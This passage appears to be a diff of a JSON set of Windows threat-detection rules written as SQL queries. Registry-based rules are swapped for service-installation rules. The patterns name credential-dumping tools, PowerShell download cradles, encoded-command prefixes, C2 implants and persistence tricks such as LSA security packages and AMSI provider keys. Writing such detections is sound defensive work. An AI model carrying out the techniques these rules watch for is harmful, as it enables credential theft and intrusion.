"win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "status": "test", - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_powershell_script_installed_as_service.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "status": "test", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ - "attack.defense_evasion", + "attack.lateral_movement", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "status": "experimental", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. Filter these according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", - "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "status": "experimental", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1037.001", "attack.persistence", - "attack.lateral_movement" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", - "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.execution", - "attack.t1112" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", - "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "status": "test", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE EventID = '27'" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055.012" - ], - "falsepositives": [ - "There are no known false positives at this time" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" - ], - "filename": "sysmon_process_hollowing.yml" - }, - { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.t1543" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Corrupted user profiles - 